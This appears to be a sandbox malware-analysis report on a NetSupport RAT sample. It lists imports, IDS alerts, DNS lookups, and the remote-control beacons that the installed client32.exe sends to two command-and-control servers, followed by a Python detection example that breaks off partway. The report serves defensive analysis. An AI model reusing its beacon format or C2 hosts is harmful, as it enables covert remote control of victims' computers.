RT_ICON | 0xcb6e0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | English | United States | 0.34104046242774566
RT_ICON | 0xcbc48 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.396505376344086
RT_ICON | 0xcbf30 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | English | United States | 0.5401624548736462
RT_ICON | 0xcc7d8 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1536 | English | United States | 0.2475609756097561
RT_ICON | 0xcce40 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2688 | English | United States | 0.42510660980810233
RT_ICON | 0xcdce8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.5310283687943262
RT_ICON | 0xce150 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.5316604127579737
RT_ICON | 0xcf1f8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.3271784232365145
RT_STRING | 0xd17a0 | 0x3f8 | data | | | 0.3198818897637795
RT_STRING | 0xd1b98 | 0x2dc | data | | | 0.36475409836065575
RT_STRING | 0xd1e74 | 0x430 | data | | | 0.40578358208955223
RT_STRING | 0xd22a4 | 0x44c | data | | | 0.38636363636363635
RT_STRING | 0xd26f0 | 0x2d4 | data | | | 0.39226519337016574
RT_STRING | 0xd29c4 | 0xb8 | data | | | 0.6467391304347826
RT_STRING | 0xd2a7c | 0x9c | data | | | 0.6410256410256411
RT_STRING | 0xd2b18 | 0x374 | data | | | 0.4230769230769231
RT_STRING | 0xd2e8c | 0x398 | data | | | 0.3358695652173913
RT_STRING | 0xd3224 | 0x368 | data | | | 0.3795871559633027
RT_STRING | 0xd358c | 0x2a4 | data | | | 0.4275147928994083
RT_RCDATA | 0xd3830 | 0x10 | data | | | 1.5
RT_RCDATA | 0xd3840 | 0x310 | data | | | 0.6173469387755102
RT_RCDATA | 0xd3b50 | 0x2c | data | | | 1.2045454545454546
RT_GROUP_ICON | 0xd3b7c | 0x84 | data | English | United States | 0.6666666666666666
RT_VERSION | 0xd3c00 | 0x584 | data | English | United States | 0.29461756373937675
RT_MANIFEST | 0xd4184 | 0x7a8 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3377551020408163
DLL | Import
kernel32.dll | GetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
comctl32.dll | InitCommonControls
user32.dll | CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
oleaut32.dll | SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
advapi32.dll | ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
Name | Ordinal | Address
__dbk_fcall_wrapper | 2 | 0x40fc10
dbkFCallWrapperAddr | 1 | 0x4b063c
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-08T19:01:53.533170+0100 | 2827745 | ETPRO MALWARE NetSupport RAT CnC Activity | 1 | 192.168.2.4 | 49740 | 199.188.200.195 | 443 | TCP
2024-11-08T19:01:53.533170+0100 | 2827745 | ETPRO MALWARE NetSupport RAT CnC Activity | 1 | 192.168.2.4 | 49739 | 151.236.16.15 | 443 | TCP
2024-11-08T19:02:17.851088+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.109.210.53 | 443 | 192.168.2.4 | 49733 | TCP
2024-11-08T19:02:56.688621+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.109.210.53 | 443 | 192.168.2.4 | 49744 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 8, 2024 19:02:24.752947092 CET | 49739 | 443 | 192.168.2.4 | 151.236.16.15
Nov 8, 2024 19:02:24.752995968 CET | 443 | 49739 | 151.236.16.15 | 192.168.2.4
Nov 8, 2024 19:02:24.753070116 CET | 49739 | 443 | 192.168.2.4 | 151.236.16.15
Nov 8, 2024 19:02:24.812295914 CET | 49739 | 443 | 192.168.2.4 | 151.236.16.15
Nov 8, 2024 19:02:24.812310934 CET | 443 | 49739 | 151.236.16.15 | 192.168.2.4
Nov 8, 2024 19:02:24.812355995 CET | 443 | 49739 | 151.236.16.15 | 192.168.2.4
Nov 8, 2024 19:02:24.841360092 CET | 49740 | 443 | 192.168.2.4 | 199.188.200.195
Nov 8, 2024 19:02:24.841391087 CET | 443 | 49740 | 199.188.200.195 | 192.168.2.4
Nov 8, 2024 19:02:24.841443062 CET | 49740 | 443 | 192.168.2.4 | 199.188.200.195
Nov 8, 2024 19:02:24.844866037 CET | 49741 | 80 | 192.168.2.4 | 104.26.0.231
Nov 8, 2024 19:02:24.850112915 CET | 80 | 49741 | 104.26.0.231 | 192.168.2.4
Nov 8, 2024 19:02:24.851196051 CET | 49741 | 80 | 192.168.2.4 | 104.26.0.231
Nov 8, 2024 19:02:24.858988047 CET | 49741 | 80 | 192.168.2.4 | 104.26.0.231
Nov 8, 2024 19:02:24.863892078 CET | 80 | 49741 | 104.26.0.231 | 192.168.2.4
Nov 8, 2024 19:02:24.873699903 CET | 49740 | 443 | 192.168.2.4 | 199.188.200.195
Nov 8, 2024 19:02:24.873713970 CET | 443 | 49740 | 199.188.200.195 | 192.168.2.4
Nov 8, 2024 19:02:24.873756886 CET | 443 | 49740 | 199.188.200.195 | 192.168.2.4
Nov 8, 2024 19:02:26.630769014 CET | 80 | 49741 | 104.26.0.231 | 192.168.2.4
Nov 8, 2024 19:02:26.630882025 CET | 49741 | 80 | 192.168.2.4 | 104.26.0.231
Nov 8, 2024 19:02:26.630956888 CET | 80 | 49741 | 104.26.0.231 | 192.168.2.4
Nov 8, 2024 19:02:26.631046057 CET | 49741 | 80 | 192.168.2.4 | 104.26.0.231
Nov 8, 2024 19:02:26.631257057 CET | 80 | 49741 | 104.26.0.231 | 192.168.2.4
Nov 8, 2024 19:02:26.631302118 CET | 49741 | 80 | 192.168.2.4 | 104.26.0.231
Nov 8, 2024 19:02:26.634793043 CET | 49741 | 80 | 192.168.2.4 | 104.26.0.231
Nov 8, 2024 19:02:26.634839058 CET | 49741 | 80 | 192.168.2.4 | 104.26.0.231
Nov 8, 2024 19:02:26.635351896 CET | 80 | 49741 | 104.26.0.231 | 192.168.2.4
Nov 8, 2024 19:02:26.635402918 CET | 49741 | 80 | 192.168.2.4 | 104.26.0.231
Nov 8, 2024 19:02:26.636816025 CET | 49742 | 80 | 192.168.2.4 | 104.26.0.231
Nov 8, 2024 19:02:26.642766953 CET | 80 | 49742 | 104.26.0.231 | 192.168.2.4
Nov 8, 2024 19:02:26.642849922 CET | 49742 | 80 | 192.168.2.4 | 104.26.0.231
Nov 8, 2024 19:02:26.643130064 CET | 49742 | 80 | 192.168.2.4 | 104.26.0.231
Nov 8, 2024 19:02:26.648468018 CET | 80 | 49742 | 104.26.0.231 | 192.168.2.4
Nov 8, 2024 19:02:27.624821901 CET | 80 | 49742 | 104.26.0.231 | 192.168.2.4
Nov 8, 2024 19:02:27.624897957 CET | 49742 | 80 | 192.168.2.4 | 104.26.0.231
Nov 8, 2024 19:02:27.625124931 CET | 49742 | 80 | 192.168.2.4 | 104.26.0.231
Nov 8, 2024 19:02:27.625165939 CET | 49742 | 80 | 192.168.2.4 | 104.26.0.231
Nov 8, 2024 19:02:27.625799894 CET | 49743 | 80 | 192.168.2.4 | 104.26.0.231
Nov 8, 2024 19:02:27.630220890 CET | 80 | 49742 | 104.26.0.231 | 192.168.2.4
Nov 8, 2024 19:02:27.630310059 CET | 49742 | 80 | 192.168.2.4 | 104.26.0.231
Nov 8, 2024 19:02:27.630713940 CET | 80 | 49743 | 104.26.0.231 | 192.168.2.4
Nov 8, 2024 19:02:27.630789995 CET | 49743 | 80 | 192.168.2.4 | 104.26.0.231
Nov 8, 2024 19:02:27.630938053 CET | 49743 | 80 | 192.168.2.4 | 104.26.0.231
Nov 8, 2024 19:02:27.635672092 CET | 80 | 49743 | 104.26.0.231 | 192.168.2.4
Nov 8, 2024 19:02:28.578772068 CET | 80 | 49743 | 104.26.0.231 | 192.168.2.4
Nov 8, 2024 19:02:28.578787088 CET | 80 | 49743 | 104.26.0.231 | 192.168.2.4
Nov 8, 2024 19:02:28.578864098 CET | 49743 | 80 | 192.168.2.4 | 104.26.0.231
Nov 8, 2024 19:02:28.579178095 CET | 49743 | 80 | 192.168.2.4 | 104.26.0.231
Nov 8, 2024 19:02:28.579219103 CET | 49743 | 80 | 192.168.2.4 | 104.26.0.231
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 8, 2024 19:02:24.672739029 CET | 57706 | 53 | 192.168.2.4 | 1.1.1.1
Nov 8, 2024 19:02:24.710263014 CET | 53 | 57706 | 1.1.1.1 | 192.168.2.4
Nov 8, 2024 19:02:24.811403990 CET | 57105 | 53 | 192.168.2.4 | 1.1.1.1
Nov 8, 2024 19:02:24.812823057 CET | 55291 | 53 | 192.168.2.4 | 1.1.1.1
Nov 8, 2024 19:02:24.820656061 CET | 53 | 57105 | 1.1.1.1 | 192.168.2.4
Nov 8, 2024 19:02:24.827537060 CET | 53 | 55291 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 8, 2024 19:02:24.672739029 CET | 192.168.2.4 | 1.1.1.1 | 0x7fad | Standard query (0) | payiki.com | A (IP address) | IN (0x0001) | false
Nov 8, 2024 19:02:24.811403990 CET | 192.168.2.4 | 1.1.1.1 | 0x8a71 | Standard query (0) | geo.netsupportsoftware.com | A (IP address) | IN (0x0001) | false
Nov 8, 2024 19:02:24.812823057 CET | 192.168.2.4 | 1.1.1.1 | 0x3d2d | Standard query (0) | anyhowdo.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 8, 2024 19:02:24.710263014 CET | 1.1.1.1 | 192.168.2.4 | 0x7fad | No error (0) | payiki.com | (none) | 151.236.16.15 | A (IP address) | IN (0x0001) | false
Nov 8, 2024 19:02:24.820656061 CET | 1.1.1.1 | 192.168.2.4 | 0x8a71 | No error (0) | geo.netsupportsoftware.com | (none) | 104.26.0.231 | A (IP address) | IN (0x0001) | false
Nov 8, 2024 19:02:24.820656061 CET | 1.1.1.1 | 192.168.2.4 | 0x8a71 | No error (0) | geo.netsupportsoftware.com | (none) | 172.67.68.212 | A (IP address) | IN (0x0001) | false
Nov 8, 2024 19:02:24.820656061 CET | 1.1.1.1 | 192.168.2.4 | 0x8a71 | No error (0) | geo.netsupportsoftware.com | (none) | 104.26.1.231 | A (IP address) | IN (0x0001) | false
Nov 8, 2024 19:02:24.827537060 CET | 1.1.1.1 | 192.168.2.4 | 0x3d2d | No error (0) | anyhowdo.com | (none) | 199.188.200.195 | A (IP address) | IN (0x0001) | false
• 151.236.16.15 (connection: keep-alive; cmd=pollinfo=1ack=1)
• geo.netsupportsoftware.com
• 199.188.200.195 (connection: keep-alive; cmd=pollinfo=1ack=1)
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49739 | 151.236.16.15 | 443 | 4008 | C:\Users\user\AppData\Roaming\SystemUtil\client32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 8, 2024 19:02:24.812295914 CET | 218 | OUT |
POST http://151.236.16.15/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Host: 151.236.16.15
Connection: Keep-Alive
CMD=POLL
INFO=1
ACK=1
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49741 | 104.26.0.231 | 80 | 4008 | C:\Users\user\AppData\Roaming\SystemUtil\client32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 8, 2024 19:02:24.858988047 CET | 118 | OUT |
GET /location/loca.asp HTTP/1.1
Host: geo.netsupportsoftware.com
Connection: Keep-Alive
Cache-Control: no-cache
Nov 8, 2024 19:02:26.630769014 CET | 1106 | IN |
HTTP/1.1 404 Not Found
Date: Fri, 08 Nov 2024 18:02:25 GMT
Content-Type: text/html; charset=us-ascii
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 8df7795488750c13-DFW
CF-Cache-Status: DYNAMIC
cf-apo-via: origin,host
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a6ycPoe%2F1N0ENKONYi9CJTqbFoMe2FudJja4eif6XS%2FkIUbRgCj4nIC99lzu5XSYDEkhiUnslG8GVe0l3ATQ5dyh3k8VBYm%2Bz%2FTUCg%2FNk2XE%2BvePKg3Lb0ksfNTozyUjsXzrnX%2FYccMZJ871"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
server-timing: cfL4;desc="?proto=TCP&rtt=2178&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
Nov 8, 2024 19:02:26.630956888 CET | 1106 | IN | HTTP/1.1 404 Not Found
Date: Fri, 08 Nov 2024 18:02:25 GMT
Content-Type: text/html; charset=us-ascii
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 8df7795488750c13-DFW
CF-Cache-Status: DYNAMIC
cf-apo-via: origin,host
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a6ycPoe%2F1N0ENKONYi9CJTqbFoMe2FudJja4eif6XS%2FkIUbRgCj4nIC99lzu5XSYDEkhiUnslG8GVe0l3ATQ5dyh3k8VBYm%2Bz%2FTUCg%2FNk2XE%2BvePKg3Lb0ksfNTozyUjsXzrnX%2FYccMZJ871"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
server-timing: cfL4;desc="?proto=TCP&rtt=2178&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                  Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
Nov 8, 2024 19:02:26.631257057 CET | 1106 | IN | HTTP/1.1 404 Not Found (same headers and body as the response above; CF-Ray 8df7795488750c13-DFW)
Nov 8, 2024 19:02:26.635351896 CET | 1106 | IN | HTTP/1.1 404 Not Found (same headers and body as the response above; CF-Ray 8df7795488750c13-DFW)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49740 | 199.188.200.195 | 443 | 4008 | C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

Timestamp | Bytes transferred | Direction | Data
Nov 8, 2024 19:02:24.873699903 CET | 222 | OUT | POST http://199.188.200.195/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Host: 199.188.200.195
Connection: Keep-Alive

CMD=POLL
INFO=1
ACK=1


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49742 | 104.26.0.231 | 80 | 4008 | C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

Timestamp | Bytes transferred | Direction | Data
Nov 8, 2024 19:02:26.643130064 CET | 118 | OUT | GET /location/loca.asp HTTP/1.1
Host: geo.netsupportsoftware.com
Connection: Keep-Alive
Cache-Control: no-cache
Nov 8, 2024 19:02:27.624821901 CET | 1104 | IN | HTTP/1.1 404 Not Found
Date: Fri, 08 Nov 2024 18:02:27 GMT
Content-Type: text/html; charset=us-ascii
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 8df7795fce8b1440-DFW
CF-Cache-Status: DYNAMIC
cf-apo-via: origin,host
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pQjO%2B41IdUtx%2FJmGyD87oAf6VQPsI1Chxse26dpberDEWTV%2FWp0MpdaxbscXKb1WGKQpzdrNsKelEeTwlExkgdzda5JgF2CrvwH0AN%2F7eje7NBY2aeMPN5e%2Fhgew8yebCx%2FRiGxCS1wYq1N7"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
server-timing: cfL4;desc="?proto=TCP&rtt=1054&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                  Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49743 | 104.26.0.231 | 80 | 4008 | C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

Timestamp | Bytes transferred | Direction | Data
Nov 8, 2024 19:02:27.630938053 CET | 118 | OUT | GET /location/loca.asp HTTP/1.1
Host: geo.netsupportsoftware.com
Connection: Keep-Alive
Cache-Control: no-cache
Nov 8, 2024 19:02:28.578772068 CET | 1091 | IN | HTTP/1.1 404 Not Found
Date: Fri, 08 Nov 2024 18:02:28 GMT
Content-Type: text/html; charset=us-ascii
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 8df77965ffcc4751-DFW
CF-Cache-Status: DYNAMIC
cf-apo-via: origin,host
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U4knnFWNE1BF9p27ArHB4yz%2FHT3QSRWU4CBsaxuAejnAP2XeAYI%2BhoGOLcuuG7PI4Ie1IpAtLJrap97WMEhm15TBDCAll7SAFt4XMFb8f63oKwgkRK67MnnOtET1aGOwhuEDZWAE0ZOUthX6"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
server-timing: cfL4;desc="?proto=TCP&rtt=1201&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                  Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Nov 8, 2024 19:02:28.578787088 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0 (zero-length chunk that terminates the chunked 404 body)
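Added detection example, written for this report rather than taken from Joe Sandbox or from NetSupport: the two request shapes in sessions 2 to 4 above are enough to build a check for NetSupport gateway beaconing. Session 2 shows the gateway transport (cleartext HTTP with an absolute-form request target sent to port 443, POST /fakeurl.htm, User-Agent NetSupport Manager/1.3, a form body carrying CMD=POLL); sessions 3 and 4 show the client's geolocation lookup against the vendor host geo.netsupportsoftware.com. The sample requests below are constructed from those sessions. The POST body separators are reconstructed: the report flattened the body to CMD=POLLINFO=1ACK=1, and Content-Length: 22 fits exactly one single-byte separator after each of the three fields, assumed here to be LF. The indicator names, the verdict labels and the allow-list of known gateways are this example's own, not anything the report defines.

```python
"""Flag NetSupport Manager gateway beacons in captured HTTP requests.
Constructed example for this report; not Joe Sandbox or NetSupport code.
Indicators are lifted from sessions 2-4 of the report (see lead-in)."""
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

GEO_HOST = "geo.netsupportsoftware.com"
GEO_PATH = "/location/loca.asp"

@dataclass
class HttpRequest:
    method: str
    target: str   # request-target as sent: absolute URL (proxy style) or path
    headers: dict  # header names lower-cased
    body: str

def parse_request(raw: str) -> HttpRequest:
    """Split a raw request into request line, headers and body (CRLF or LF)."""
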